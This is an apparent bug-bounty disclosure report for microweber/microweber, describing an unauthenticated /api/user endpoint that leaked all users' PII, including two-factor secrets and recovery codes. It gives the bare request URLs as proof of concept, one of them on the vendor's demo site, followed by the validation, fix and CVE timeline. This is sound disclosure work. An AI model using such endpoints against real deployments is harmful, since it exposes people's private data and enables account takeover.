Unauthenticated Access to Users PII in microweber/microweber

Valid

Reported on

Mar 21st 2023

Description

A Unauthorized/Unauthenticated Attacker can access PII data of all the Users.

Some of the PII leaked are: first name, last name, email, username, IP address, two_factor_secret, two_factor_recovery_codes

Proof of Concept

http://localhost/api/user

It shows you details of all the users

https://demo.microweber.org/demo/api/user

This also works on the demo site

Impact

An Attacker can access the PII data.

We are processing your report and will contact the microweber team within 24 hours. 2 months ago
We have contacted a member of the microweber team and are waiting to hear back 2 months ago
Peter Ivanov modified the Severity from High (8.2) to High (7.1) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 2 months ago
Garth Humphreys has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.3.4 with commit b0644c 2 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 22nd 2023
Garth Humphreys
2 months ago

Researcher

Thank you for validating the issue.

Peter Ivanov published this vulnerability a month ago
to join this conversation